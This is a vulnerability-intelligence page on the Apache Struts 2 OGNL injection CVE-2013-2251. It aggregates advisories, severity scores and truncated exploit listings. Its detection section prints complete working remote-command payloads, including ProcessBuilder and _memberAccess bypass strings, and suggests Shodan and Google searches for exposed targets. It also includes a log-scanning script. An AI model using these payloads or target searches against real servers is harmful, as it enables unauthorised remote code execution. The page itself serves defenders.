CVE-2013-2251
Published 2013-07-20
Priority: P1 · 97 · critical · CVSS 3.1: 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Flags: KEV, ITW, EXPLOIT
CISA Known Exploited Vulnerability, due 2022-04-15
Exploited in the wild
EPSS: 100.00% (100.0th percentile)
Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | archiva | — | — |
| apache | archiva | — | — |
| apache | archiva | >= 1.3 < 1.3.8 | 1.3.8 |
| apache | struts | 2.0.0 – 2.3.15 | — |
| cisco | products | — | — |
| fujitsu | interstage_business_process_manager_analytics | — | — |
| fujitsu | interstage_business_process_manager_analytics | — | — |
| oracle | siebel_apps_e-billing | — | — |
| oracle | siebel_apps_e-billing | — | — |
| oracle | siebel_apps_e-billing | — | — |
Detection & IOCs (extracted from sources)
- url: /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
- url: /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
- url: /struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
- url: /struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
- url: /struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
- command: redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','<cmd>'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}
- command: %{#_memberAccess['allowStaticMethodAccess']=true,@java.lang.Runtime@getRuntime().exec('your commands')}
- command: %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),@java.lang.Runtime@getRuntime().exec('your commands')}
- yara regex: ((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)
- Alert on HTTP responses with status 302 where the Location header reflects evaluated OGNL expression output (e.g., arithmetic results or file path strings), indicating successful OGNL injection via redirect: prefix.
- Use Shodan queries to identify exposed Apache Struts instances as potential targets: search for 'http.html:"apache struts"', 'http.title:"struts2 showcase"', or 'http.html:"struts problem report"'.
- Use Google dork 'ext:action | filetype:action' or 'intitle:"struts2 showcase"' to identify publicly exposed Struts 2 action endpoints.
- Monitor HTTP responses for uid/gid output patterns matching the regex ((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\) in the response body, indicating successful OS command execution via OGNL injection.
- Flag HTTP requests to .action endpoints where query parameters contain URL-encoded OGNL constructs referencing 'ProcessBuilder', 'Runtime', 'getInputStream', or 'HttpServletResponse' — all hallmarks of this exploit's RCE payload.
- Detect attempts to bypass static method access restrictions in OGNL by monitoring for '#_memberAccess' manipulation patterns in HTTP parameters, including both property-level ('allowStaticMethodAccess') and object-replacement techniques.
- The 'action:' prefix can only be used for exploitation if wildcard mapping is enabled in the Struts 2 configuration; 'redirect:' and 'redirectAction:' are not constrained by configuration and are universally exploitable on DefaultActionMapper.
- All Struts 2 applications using DefaultActionMapper are vulnerable regardless of whether the application was designed to accept prefixed parameters, because prefixed parameters forcefully override application behavior.
- After upgrading to the patched version, 'redirect:' and 'redirectAction:' parameters are completely dropped and no longer functional, which may cause compatibility issues for applications relying on these features.
- The static method access bypass via '#_memberAccess["allowStaticMethodAccess"]=true' was patched in Struts 2.3.14.2, but alternative techniques (reflection-based or object replacement) remain viable in later vulnerable versions up to 2.3.15.
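The request-side and response-side checks in the notes above can be combined into one access-log triage pass. This is an added example, not code from this page or from any source it aggregates; the log lines are constructed, and the `.action` extension check and the function names are assumptions.

```python
import re
from urllib.parse import unquote_plus

PREFIXES = ("action:", "redirect:", "redirectAction:")   # named in the advisory
MARKERS = ("ProcessBuilder", "Runtime", "getInputStream",
           "HttpServletResponse", "#_memberAccess")       # from the notes above
EXPR_OPEN = re.compile(r"[$%]\{")                         # ${...} or %{...}
ID_OUTPUT = re.compile(r"((u|g)id|groups)=[0-9]{1,4}\([a-z0-9]+\)")
LOG_LINE = re.compile(r'"[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')

# Constructed access-log lines (documentation IPs, non-functional fragments).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /foo.action?redirect:http://www.google.com/ HTTP/1.1" 302 0',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /login.action?redirect:$%7B%23a%3d(new%20java.lang.ProcessBuilder(CONSTRUCTED)).start()%7D HTTP/1.1" 200 41',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /employee/save.action?redirectAction:%2525%257B%2523_memberAccess.CONSTRUCTED%257D HTTP/1.1" 302 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /employee/list.action?page=2 HTTP/1.1" 200 5120',
]


def fully_decode(text, max_rounds=3):
    """Undo up to max_rounds layers of URL encoding (covers double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify_target(target):
    """Return (verdict, prefix, markers) for a request target, or None."""
    path, _, query = target.partition("?")
    # Assumption: actions use the default ".action" extension (configurable).
    if not path.lower().endswith(".action"):
        return None
    weakest = None
    for raw_param in query.split("&"):       # split before decoding
        param = fully_decode(raw_param)
        name = param.split("=", 1)[0]
        prefix = next((p for p in PREFIXES if name.startswith(p)), None)
        if prefix is None:
            continue
        hits = [m for m in MARKERS if m in param]
        if hits or EXPR_OPEN.search(param):
            return ("ognl-injection", prefix, hits)
        # Plain prefixed navigation: legitimate before the fix, dropped after it.
        weakest = ("prefixed-param", prefix, hits)
    return weakest


def response_shows_id_output(body):
    """True when a response body contains uid/gid/groups command output."""
    return bool(ID_OUTPUT.search(body))


def scan_access_log(lines):
    """Return (line_number, verdict, prefix, markers) for each flagged line."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = LOG_LINE.search(line)
        verdict = classify_target(match.group("target")) if match else None
        if verdict:
            findings.append((number, *verdict))
    return findings
```

Only the query string is inspected here; prefixed parameters sent in a POST body need the same check against request-body logs or a WAF.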
CVSS provenance
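| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
| vendor_cisco | — | 10.0 | CRITICAL | — |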
CISA
Apache Struts Improper Input Validation Vulnerability
cisa·2022-03-25·CVSS 9.8
CVE-2013-2251 [CRITICAL] CWE-20 Apache Struts Improper Input Validation Vulnerability
Vulnerability: Apache Struts Improper Input Validation Vulnerability
Affected: Apache Struts
Apache Struts allows remote attackers to execute arbitrary Object-Graph Navigation Language (OGNL) expressions.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2013-2251
Remediation Due Date: 2022-04-15
Cisco
Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products
vendor_cisco·2013-10-23·CVSS 10.0
CVE-2013-2251 [CRITICAL] CWE-20 Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products
Multiple Cisco products include an implementation of the Apache Struts 2 component that is affected by a remote command execution vulnerability.
The vulnerability is due to insufficient sanitization of user-supplied input. An attacker could exploit this vulnerability by sending crafted requests consisting of Object-Graph Navigation Language (OGNL) expressions to an affected system. An exploit could allow the attacker to execute arbitrary code on the targeted system.
Cisco has released software updates that address this vulnerability for all the affected products except Cisco Business Edition 3000. Cisco Business Edition 3000 customers should contact their Cisco representative for available options.
Workarounds t
Cisco
Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products
vendor_cisco
CWE: CWE-20
Bug IDs: CSCui22841, CSCui33268, CSCui40582
OSV
Code injection in Apache Struts
osv·2022-05-13
CVE-2013-2251 [CRITICAL] Code injection in Apache Struts
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.
In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since this information is evaluated as an OGNL expression against the value stack, this introduces the possibility to inject server-side code.
GHSA
Code injection in Apache Struts
ghsa·2022-05-13
CVE-2013-2251 [CRITICAL] CWE-20 Code injection in Apache Struts
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.
In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since this information is evaluated as an OGNL expression against the value stack, this introduces the possibility to inject server-side code.
VulnCheck
Apache Struts Improper Input Validation Vulnerability
vulncheck·2013·CVSS 9.8
CVE-2013-2251 [CRITICAL] CWE-20 Apache Struts Improper Input Validation Vulnerability
Apache Struts allows remote attackers to execute arbitrary Object-Graph Navigation Language (OGNL) expressions.
Affected: Apache Struts
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://veriti.ai/blog/vulnerable-villain-when-hackers-get-hacked/; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389; https://www.labs.greynoise.io/grimoire/2025-12-26-coldfusion/
Remediation Due: 2022-04-15
No detection rules found.
Exploit-DB
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
exploitdb·2020-10-20·CVSS 9.8
CVE-2013-2251 [CRITICAL] Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
---
# Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
# Google Dork: ext:action | filetype:action
# Date: 2020/09/09
# Exploit Author: Jonatas Fil
# Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html
# Version: <= 2.3.15
# Tested on: Linux
# CVE : CVE-2013-2251
#!/usr/bin/python
#
# coding=utf-8
#
# Struts 2 DefaultActionMapper Exploit [S2-016]
# Interactive Shell for CVE-2013-2251
#
# The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with
# "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with
# attaching navigational information to
Exploit-DB
Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection
exploitdb·2014-01-14·CVSS 9.8
CVE-2013-2251 [CRITICAL] Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection
Struts2's ActionMapper is a mechanism for mapping between incoming HTTP
request and action to be executed on the server. DefaultActionMapper is
a default implementation of ActionMapper. It handles four types of
prefixed parameters: action:, redirect:, redirectAction: and method:.
For example, redirect prefix is used for HTTP redirect.
Normal redirect prefix usage in JSP:
...
If the cancel button is clicked, redirection is performed.
Request URI for redirection:
/foo.action?redirect:http://www.google.com/
Response Header:
HTTP/1.1 302 Found
Location: http://www.google.com/
Usage of other prefixed parameters is similar to redirect.
See Struts2 document for details.
https://cwiki.apache.org/confluence/display/WW/ActionMapper
As stated already, there are four
Exploit-DB
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)
exploitdb·2013-07-27
CVE-2013-2251 Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution',
'Description' => %q{
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation
state changes by prefixing parameters with "action:" or "redirect:", followed by
a desired navigational target expression. This mechanism was intended to help with
attaching navigational information to buttons within forms.
In Struts 2 before 2.3.15
Nuclei
Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
nuclei·CVSS 9.8
CVE-2013-2251 [CRITICAL] Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code.
Template:
id: CVE-2013-2251
info:
  name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
  author: exploitation,dwisiswant0,alex
  severity: critical
  description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code.
  impact: |
    This vulnerability can lead to rem
Metasploit
Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
metasploit
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since this information is evaluated as an OGNL expression against the value stack, this introduces the possibility to inject server-side code.
arXiv
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
arxiv_fulltext·2019-05-29
## Abstract
Despite the fact that cyberattacks are constantly growing in complexity, the research community still lacks effective tools to easily monitor and understand them.
In particular, there is a need for techniques that are able to not only track how prominently certain malicious actions, such as the exploitation of specific vulnerabilities, are exploited in the wild, but also (and more importantly) how these malicious actions factor in as attack steps in more complex cyberattacks.
In this paper we present ATTACK2VEC, a system that uses temporal word embeddings to model how attack steps are exploited in the wild, and track how they evolve.
We test ATTACK2VEC on a dataset of billions of security events collected from the c
Unit42
Two New IoT Vulnerabilities Identified with Mirai Payloads
blogs_unit42·2020-10-14
Ken Hsu
Yue Guan
Vaibhav Singhal
Qi Deng
Published: October 14, 2020
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While this generic approach allows researchers to observe the entire killchain and even acquire the malware binary from the attack, this post-exploitation heuristic does have its caveat: the traffic fingerprinting. Similar services yield similar traffi
Bugzilla
CVE-2013-2251 Apache Struts 2 arbitrary OGNL code execution via crafted parameters
bugzilla·2013-07-19·CVSS 9.8
CVE-2013-2251 [CRITICAL] CVE-2013-2251 Apache Struts 2 arbitrary OGNL code execution via crafted parameters
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.
In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since this information is evaluated as an OGNL expression against the value stack, this introduces the possibility to inject server-side code.
Upstream Advisory: http://struts.apache.org/release/2.3.x/docs/s2-016.html
Upstream bug: https://issues.apache.org/jira/browse/WW-4140
Upstr
References:
- http://archiva.apache.org/security.html
- http://cxsecurity.com/issue/WLB-2014010087
- http://osvdb.org/98445
- http://packetstormsecurity.com/files/159629/Apache-Struts-2-Remote-Code-Execution.html
- http://seclists.org/fulldisclosure/2013/Oct/96
- http://seclists.org/oss-sec/2014/q1/89
- http://struts.apache.org/release/2.3.x/docs/s2-016.html
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131023-struts2
- http://www.fujitsu.com/global/support/software/security/products-f/interstage-bpm-analytics-201301e.html
- http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html
- http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html
- http://www.securityfocus.com/bid/61189
- http://www.securityfocus.com/bid/64758
- http://www.securitytracker.com/id/1029184
- http://www.securitytracker.com/id/1032916
- https://exchange.xforce.ibmcloud.com/vulnerabilities/90392
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2013-2251
Published: 2013-07-20
Added to CISA KEV: 2022-03-25
Exploited in the wild